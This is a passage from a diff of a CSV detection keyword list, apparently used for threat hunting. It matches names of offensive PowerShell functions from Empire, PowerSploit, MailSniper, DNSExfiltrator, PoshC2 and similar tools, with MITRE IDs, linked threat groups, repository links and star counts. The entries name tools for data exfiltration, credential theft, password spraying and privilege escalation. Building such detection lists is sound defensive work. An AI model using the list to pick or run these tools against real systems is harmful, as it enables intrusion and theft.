- T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" -"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" -"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a 
penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-DOSfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","744","129","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" -"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a 
proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Empire *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - 
T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - 
APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" 
+"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*invokeenumeratelocaladmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 
- T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 